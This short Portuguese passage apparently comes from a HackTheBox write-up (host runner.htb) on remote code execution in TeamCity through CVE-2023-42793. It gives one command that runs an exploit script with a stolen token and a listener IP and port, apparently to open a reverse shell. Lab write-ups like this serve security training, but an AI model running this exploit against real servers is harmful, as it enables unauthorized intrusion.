
RCE do TeamCity para Linux (CVE-2023-42793)
Você precisará obter o token primeiro usando um exploit diferente. No entanto, o exploit a seguir permitirá que você obtenha RCE no servidor Linux, pois ele codifica o payload na URL e o envia para o servidor.
python3 ./main -t TEAMCITY_TOKEN -u http://teamcity.runner.htb -p 80 -ni LISTENER_IP -np LISTENER_PORT